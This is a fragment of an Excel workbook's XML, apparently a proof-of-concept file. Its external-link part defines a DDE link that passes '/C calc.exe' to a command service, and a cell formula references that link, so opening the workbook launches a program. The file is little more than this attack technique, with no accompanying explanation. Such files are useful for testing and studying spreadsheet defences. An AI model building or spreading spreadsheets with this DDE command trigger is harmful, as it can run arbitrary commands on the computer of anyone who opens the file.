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699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md" ddeTopic="/C calc.exe">
    <ddeItems>
      <ddeItem name="_xlbgnm.A1" advise="1"/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6.5703125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1" t="e">
        <f>[1]!_xlbgnm.A1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2021-03-01T14:19:51Z</dcterms:modified>
</cp:coreProperties>
</file>